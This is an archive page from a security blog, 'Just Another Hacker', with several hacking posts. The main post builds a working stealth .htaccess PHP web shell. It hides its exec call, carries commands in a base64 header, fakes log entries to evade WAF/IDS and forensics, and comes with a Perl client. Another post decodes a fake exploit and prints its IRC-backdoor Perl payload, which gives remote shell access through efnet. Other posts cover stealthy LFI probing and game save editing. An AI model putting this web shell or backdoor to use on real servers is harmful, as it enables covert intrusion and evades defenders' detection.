Results tagged “hacking” from Just Another Hacker

Ruxcon 2012

|
If you're familiar with the Ruxcon security conference then this is proabably just repeating what you already know. However, if you are not familiar with the conference, then I strongly suggest you check it out, and not just because I'm presenting this year. It is an excellent conference! Traditionally it delivers a strong lineup of technical, in-depth presenters who know their subject well and delivers valuable information.

The details of my presentation are on the Ruxcon website. Hope to see you there!

Writing a stealth web shell

|
People keep referring to the htshells project as stealth!?!?!?!? They are very unstealthy, leaving plenty of evidence in the logs, but it did get me thinking, what would a .htaccess stealth shell look like? In order to claim the status of "stealth" the shell would have to meet the following requirements:
  • No bad function calls
  • Hidden file
  • Hidden payload
  • Hidden url
  • WAF/IDS bypass
  • Limited forensic evidence
Looks like a small list, shouldn't be too hard....

No bad function calls
The shell should not contain any bad function calls such as eval, passthru, exec, system, `` or similar operators. This is to avoid detection from scanners such as anti vrus or static analysis tools. We have a few options here, such as using a variable variable to dynamically assign the function to call,  or we could go with the non alpha php shell. I did however choose to go with a feature that relies on common methods and AFAIK not many scanners pick up on variable function calls.

Hidden file
I already solved this with my htshells project. Having your shell in a dot file keeps it hidden on linux. If you cannot upload a .htaccess file however I would aim to hide in plain sight with a index.php file instead.

Hidden payload
In order to keep the payload out of the url we'll provide it outside of the request URI and request body. A cookie is a common place to store the payload, but I decided to use a non cookie header. Just to be safe, in case someone decides to log cookies.

Hidden url
Luckily the htaccess file also offers us an option to hide the url of our web shell using mod_rewrite. This allows us to invoke the shell through a different url.

WAF/IDS bypass
By applying common encoding we can ensure that plaintext rules don't match our payload and make parsing the request expensive enough to ensure that realtime decoding isn't feasible. For the extra paranoid, encoding in combination with basic obfuscation will stop detection by IDS which can offload the offline decoding to an agent. I chose plain base64_encoding, and padded it with some bytes to make automated parsing fail.

Limited forensic evidence
This is where most shells fails, most web scripts use request parameters for command input. This is great on penetration tests as it offers transparency to the client, but it's not very stealthy. I'll start by illustrating a log segment for favicon requests.
# grep favicon.ico /var/log/apache2/access.log
78.84.166.152 - - [20/Apr/2011:09:46:30 +0400] "HEAD /favicon.ico HTTP/1.0" 200 - "-" "-"
76.120.74.98 - - [20/Apr/2011:09:52:27 +0400] "GET /favicon.ico HTTP/1.0" 200 9326 "-" "Safari/6533.19.4 CFNetwork/454.11.5 Darwin/10.6.0 (i386) (MacBook2%2C1)"
76.120.74.98 - - [20/Apr/2011:10:07:29 +0400] "GET /favicon.ico HTTP/1.0" 200 9326 "-" "Safari/6533.19.4 CFNetwork/454.11.5 Darwin/10.6.0 (i386) (MacBook2%2C1)"
192.168.24.122 - - [20/Apr/2011:10:32:31 +0400] "GET /favicon.ico HTTP/1.0" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"
As you can see from the example, the log records the IP of the client making the request, the (server) time of the request, the request method and url, response code, response size, referrer and user-agent. Normally the htshell would be a dead giveaway:
127.0.0.1 - - [23/Jan/2012:11:47:32 +1100] "GET /.htaccess?c=uname -a HTTP/1.1" 200 617 "-" "Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
It is clear that the url accessed was .htaccess,and it responded with a 200 OK response code instead fo the usual 403, it is also evident what command was run. In order to keep the shell from leaving forensic evidence, we will disguise the request to the shell as a normal 200 OK or a 404 response to a seemingly normal file using the hidden url and hidden payload.

Now for the actual implementation, using php for the programming language:

- No bad function calls
Invoking function names by string FTW! $e = str_replace('y','e','yxyc'); $e($cmd) will call exec on $cmd.

- Hidden file
the shell is .htaccess, as hidden as it gets.

- Hidden payload
Receive the payload via the X-ETAG header, which is accessible via: $_SERVER['HTTP_X_ETAG'] and send the response via the same header. This requires output buffering to be enabled otherwise PHP will complain about headers being sent after output has started. Luckily this is not an admin flag and can be set from within the .htaccess file itself using: php_value output_buffering 1.

- Hidden url
Rewrite supposed url to the .htaccess file if X-ETAG request header is set
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]
This allows us to make requests to existing files, and gettting the shell if the X-ETAG header is set.

- WAF/IDS bypass
By padding the base64 encoding with two bytes automated base64 decoding attempts will fail with a length check error.
base64_decode(substr($_SERVER['HTTP_X_ETAG'],2))

- Limited forensic evidence
By generating output PHP will set the response code to 200 OK, although a header() call can easily be used to make it something else. Thanks to the output buffering the content of the .htaccess file can be discarded and the response size can be set to a known value. I'm using print str_repeat("A", 9326); to match the size of my favicon which can be seen in the first log snippet.

This all combines to the following file:
# Self contained .htaccess stealth web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web

    Order allow,deny
    Allow from all


# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

# Enable output buffering so we can fudge content length in logs
php_value output_buffering 1

# Rewrite supposed url to the .htaccess file if X-ETAG request header is set
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]

# SHELL <?php ob_clean(); $e = str_replace('y','e','yxyc'); $e(base64_decode(substr($_SERVER['HTTP_X_ETAG'],2))." 2>&1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print str_repeat("A", 9326); ob_flush(); exit(); ?>

Unfortunately the WAF/IDS bypass makes it somewhat unfriendly to use with traditional HTTP clients, so I wrote a perl based client:
#!/usr/bin/perl
# Interface for the mod_php htaccess stealth shell
# Written by Wireghoul - http://www.justanotherhacker.com

use warnings;
use strict;
use MIME::Base64;
use LWP::UserAgent;

&usage unless $ARGV[0];
my $url = $ARGV[0];
pop(@ARGV); #keep readline happy
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16');

sub usage {
    print "Usage: $0 url\nExample: $0 http://vuln.com/upload/favicon.ico\n";
    exit 2;
}

my $cmd = '';
print "Connecting to shell at $url - type 'exit' to exit";
until ($cmd eq 'exit') {
    print "\nshell> ";
    $cmd = readline;
    chomp $cmd;
    my $payload = 'AA'.encode_base64($cmd);
    my $response = $ua->get( $url, 'X-ETAG' => $payload);
    if ($response->header('X-ETAG')) {
      print decode_base64(substr($response->header('X-ETAG'),2));
    } else {
      print "Error! No payload in response!\n";
    }
}

A quick demo:
# GET http://localhost/favicon.ico | head -1
________________________________________
h6  �@@(F( 
# ./stsh.pl http://localhost/favicon.ico
Connecting to shell at http://localhost/favicon.ico - type 'exit' to exit
shell> uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell> exit
# tail -3 /var/log/apache2/access.log
127.0.0.1 - - [31/Jan/2012:14:07:59 +1100] "GET /favicon.ico HTTP/1.1" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"
127.0.0.1 - - [31/Jan/2012:14:08:01 +1100] "GET /favicon.ico HTTP/1.1" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"
127.0.0.1 - - [31/Jan/2012:14:08:03 +1100] "GET /favicon.ico HTTP/1.1" 200 9326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"
Notice there is nothing indicating any difference between the first request (normal request to the actual file) and the two shell commands.
Some parting notes:
  • Large response bodies can cause the header to exceed the maximum size defined when compiling Apache (default 8190), the best way to get around this is to store the command output in the session and return it one chunk at a time.
  • Divert the investigator by presenting a likely scenario, if there is an existing file, such as a picture. Hotlink the image from a public forum and use the forum url as referrer value and use a known aggressive crawler as the user agent.
  • Rewrite the shell to use different values than the X-ETAG, etc used in the demo script for better WAF bypass.
  • I guess it's OK to call the htshells project stealth now??
  • Systems that log response length as headers and response body will show varying content length for the shell requests, this is not the default apache behaviour and requires additional modules to be enabled.

If I missed anything, please leave a commant and I will address it. If you like my work, please say thanks or buy me a beer!


Quick and dirty exploit vetting

|
Got some exploit code that you didn't write? You had better check it first. Especially as I've seen a few people link to fake exploits lately. One example is the supposed winnuker from http://www.hackerthreads.org/Topic-5973. Which sports the following payload:


h3llc0de=
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
"\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
"\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
"\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
"\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
"\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
"\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
"\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
"\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
"\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
"\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
"\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
"\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
"\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
"\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
"\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
"\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
"\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
"\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
"\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
"\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
"\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
"\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
"\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
"\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
"\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
"\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
"\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
"\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
"\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
"\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
"\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
"\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
"\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
"\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
"\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
"\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
"\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"; 
Never run an exploit if you didn't write it or don't understand the shellcode. I cannot stress that enough. Anyway, the exploit code has a bad smell to it, so I do a lazy check of the shell code:
~$ echo -e "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
If you work with hex or shellcode regularly you might have already worked out that the shellcode was in fact text (the large number of \x20 is a pretty dead giveaway). As you can see a quick check of the shellcode reveals that this is in fact a fake exploit that offers a remote shell to the entire efnet #darknet channel. If the shellcode is binary then you'll need to do some more analysis, but for most fake exploits the above technique usually reveals them.
Internet Explorer and the .NET Framework are hardcoded not to send requests for "127.0.0.1" or  "localhost' through a proxy. So if you're testing an application that communicates with a service bound to the loop back interface it's not straight forward to intercept the traffic using Burp or another intercepting proxy. In IE9 they fixed this, by adding <-localhost> to the "do not use proxy" list will override this behavior. However if you're testing on an older version of IE you will have to use a work around.

Most articles on the web will tell you to use the IP address or machine name of the server you are testing. Which works fine if the service is bound to 0.0.0.0 or the public interface. However, if the service is bound to 127.0.0.1 you cannot reach the service via the machine name or the public interface IP. One option is to setup a tunnel using netcat, stunnel, socat, etc to forward requsts from the public interface to the loopback interface. Or you can use dns. The hardcoded restriction only triggers if the url has the string 127.0.0.1 or localhost in it. Requests to 127.0.0.2 or a domain that resolves to 127.0.0.1 are sent through the proxy.

So depending on your level of access to the system, you can add an entry in c:\windows\system32\drivers\etc\hosts for l0calhost , like this:
127.0.0.1 l0calhost
Or you can create a dns entry for a domain you control that resolves to 127.0.0.1. If you are running bind that should look like this (remember to update the serial number too):
loopback.yourdomain.com IN A 127.0.0.1

You can now intercept the traffic for the service through the proxy by using http://l0calhost/ or http://loopback.yourdomain.com/


Most of us think game over when we see a url that cointains a file reference, like http://localhost/basename.php?file=hello.php. Lets say that you were doing a penetration test where you are trying not to trigger any IDS alerts. How can you determine if the script filters the page variable using basename? Here are some simple steps that should go undetected.

Lets say that the scripts in this fictional url are as follows:
[basename.php]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
        <title>Basename poc file</title>
</head>
<body>
<?php
if (file_exists(basename($_GET['file']))) {
        include(basename($_GET['file']));
} else {
        echo "404 - File not found";
}
?>
</body>
</html>
[hello.php]
<?php echo "Hello World\n"; ?>
The first test we take is to determine what a negative response would be, we'll visit http://localhost/basename.php?file=hello.wisconsin, this nets us a custom 404 error. Now that we have a false contition the next test is simply http://localhost/basename.php?file=a/b/c/hello.php. If this gives us the same output as http://localhost/basename.php?file=hello.php the script is using basename (or a similar technique) to extrace the filename. If you get a negative response the script appears to be vulnerable to directory traversal/LFI/RFI. Better encode your next attack to avoid triggering the IDS.

Happy hacking!
(And yes, this is the February tutorial running late).

Game hacking - Hex editing memory

|
Only a few days after I posted my Hex editing save game tutorial, kees over at codeblog posted a quick recounting of how he hacked a game by hex editing the memory on linux.

If you liked my article you should find this interresting, http://www.outflux.net/blog/archives/2011/02/05/fun-with-game-memory/.

January tutorial

|
Last months tutorial ran a little over time. It was game related as it was written during winter-een-mas, but it is finally online without too many spelling mistakes.

The January tutorial is:
Game hacking - Hex editing save games
Before the internet most people would get their cheat codes from gaming magazines, gaming guide books or a BBS. In my circle writing walk throughs and cheat sheets for games and posting them to "our" BBS was the quickest way to fame. Modifying your save games to gain endless wealth or lives is very simple as still a valid technique today, and I'm going to show you how to do it.

In order to follow this "tutorial" you will need five things:
  1. A computer
  2. The internet (to read this article and download software)
  3. A hex editor (I use HxD)
  4. A game where you can save your progress
  5. Basic understanding of hex (or this cheat sheet)
For my tutorial I am using the free game Decker. It is a "hacking" game based on neuromancer/shadowrun. Grab a copy from http://www10.caro.net/dsi/decker/, microwave some popcorn and lets have from fun.

So lets fire up decker, choose to start a new game then pick your character's name and image. Then as soon as we enter the game, save it. I named mine "first-save.dsg". This is your baseline file to compare against.
decker-character-initial.pngdecker-spend-some-cash.PNG
Next enter the shop and spend some of your $100 starting money. Then save the game again. This time I named mine "spent-money.dsg". Now comes the fun part, open both dsg files in HxD and use the Analyse->Compare->File compare operation (ctrl+k).

Here is where some basic hex knowledge comes in handy, we know we started with $100 (xx in hex) and you should know how much money you had left in your second save game. If the changes matches both values then you should have the right offset.
decker-compare-files-money-offset.png

Now we change this value to FF FF to give ourselves a decent amount of cash. Open decker again and load your modified save game to confirm that you have $65535 (FF FF = 65535). Now you have the option of spending this money, if you do then remember to save a new base line file for comparing against before you do the next step.

decker-compare-files-changed-money-offset.png
decker-character-richguy.png

Next it's time to do a mission, I picked a simple IO mission and found the controlling node right away. I disabled the alarms and disconnected from the matrix. This gained me a skill point. This is a great time to save a baseline file (which I didn't) and then you can load it and reuse it to find the offset for each skill. However I spent it right away on stealth. I then saved the file and opened spent-money.dsg and sneaky-guy.dsg in HxD to do a file compare. This time there was more than one change.
decker-mission-success.pngdecker-sneaky-guy.PNG

decker-compare-files-sneaky-first-change.png
The first change is in an offset we know is money.

decker-compare-files-sneaky-second-change.png
The second change is unknown to us, and although it has changed in value by 1, it does not match the before and after values we expect.

decker-compare-files-sneaky-third-change.png
The third change has the right values in the before and after files. I changed the offset to FF ,saved the file and opened it up in decker. With a stealth skill of 255 you don't have to upgrade your gear or software to complete missions with ease.
 
decker-hacked-stealth.png

However, it would be nice with some symmetry between the skills, hardware and software levels. I'll leave that as exercise for you.

Here are some other offsets you might want to change:
[ Character stats ]
00000010 06-08 = Money
00000010 0A = Lifestyle (00-04)
00000020 02 = Mission success/failure tracking value (for next attribute point?)
00000020 06 = Attack attribute/skill
00000020 0A = Defense attribute/skill
00000020 0E = Stealth attribute/skill
00000030 02 = Analysis attribute/skill
00000030 06 = Programming attribute/skill
00000030 0A = Chip design attribute/skill
[ Cyber deck stats ]
00000100 0D = CPU Rating
00000110 02 = Attack firmware
00000110 06 = Defense Firmware
00000110 0A = Stealth Firmware
00000110 0E = Analysis Firmware
00000120 02 = Coprocessor

Challenge:
Can you find the offset for your softwarelevels, loaded and autoload settings?


















I am presenting at this months Ruxcon Monthly Meetup.

Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)

RMIT Building 8 entrance is off Swanston Street (just past Swanston and
La Trobe). Please take the lift to Level 9 and make your way to Room 42.
We will have directions posted up in the building.

Presentations
=============

Unsanitary Web Activities - Tim Noise (MovingData)

In the land of the internet, web developers are constantly rolling out
new applications and letting them free into the Internet. Many with
little knowledge or experience in security. They assume the users will
provide data in a manner they expect. This talk will cover webapp
security basics and commonplace attacks, showing you the effect this
oversight can have, and how to prevent it.

Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup
(Stratsec)

In this talk the presenter will discuss various security incidents he
has been involved in during the course of his career. Starting with old
school bof through to modern day malware and blackmail. This isn't a
deep technical analysis of each incident but an overview of the
charateristics of each of the attacks and what the repurcussions were to
the organisation or individual.

Static analysis with Graudit - Eldar Marcussen

Graudit is a rough audit tool, that can be used to find vulnerabilities
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this
presentation I will show how to get the most out of graudit.

In the spirit of openness the Apache foundation has released an excellent post mortem write up of their recent compromise. It started with a XSS attack leveraged through the issue tracking software they use (JIRA) and ended with complete root access on one server, limited access to another and a number of passwords compromised.

Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010

Ruxcon 2010

|
My favourite con is back! Ruxcon 2010 will be held in Melbourne (FOR TEH WIN!) at RMIT campus on December 4 & 5. The call for paper is out, deadline for submissions is 30th of July.

Please see http://www.ruxcon.org.au for more details.

Post mortems - Wargames

|
With smpCTF looming I thought I would link to these excellent "post mortems" from
CCDC 2010 and Reiners exploiting past sql filters, something we have seen in the last two codegate and owaspeu10 challenges...
CCDC 2010 - Part1
CCDC 2010 - Part 2
Reiners - Exploitiing hard filtered sql injection article
smp Capture The Flag (CTF), 2010 Hacker Olympics, is a contest designed by "hackers" and "security enthusiasts" for the like to battle it out against each other over a highly sugar induced weekend. In the smpCTF Hacker Olympics teams and individuals are put up against other teams from around the globe in the same environment with the same objectives and a mission to accomplish.

Do you have what it takes to compete...?

More details at http://www.smpctf.com/ dates and times have not yet been decided.

Robert Hansen is at it again. This time he has produced a very simple exploit that will steal passwords that are stored (remembered) in the browser.The code is very simple and works a treat for Firefox.

I would recommend this over the usual XSS alert boxes the next time you are demoing cross site scripting. Try it out at http://ha.ckers.org/weird/xss-password-manager.html. I haven't tried it in any browsers besides firefox, but even if you can't read it straight out of the DOM, you could always rewrite the form action url or even hook the onsubmit call to send the username and password to a destination of your choosing.

Security roulette

|
I had some spare time, so I created a little game. I've called it security roulette. The object is to find as many web application security flaws as you can in a given number of websites in a limited timeframe.The number of websites is determined by google and the time limit is self imposed or agreed to if you are challenging someone.

I wrote a quick mashup to help you play. The scorecard could probably use some tweaking. My suggested house rule is "no browser plugins or third party applications allowed".

Security roulette

|
Security roulette is a simple game I have made up, the instructions are provided once you start. Use the form below to get started.

Game hacking - Number theory

|
For my second wintereenmas article I look at game hacking through number theory. This is a huge subject, even without hacking, but I focused on two of the most common techniques that I have been able put to extensive use. You can read the full article here.


Game hacking - Number theory

|
In most games there is a fair amount of mathematics involved. It may not always seem that way, but the numbers are there, you just have to find them. Now you don't have to be a mathematics expert to take advantage of numbers theory to cheat or win at games. Quite often you only need a single advantage to take you to the winning side. Although some of this will be applicable to board games, or MMORPS I am basing this article around browser based games. To illustrate I will use a fictional rpg game where I play an angry axe wielding barbarian. Lets call it browsercraft...

Negative numbers


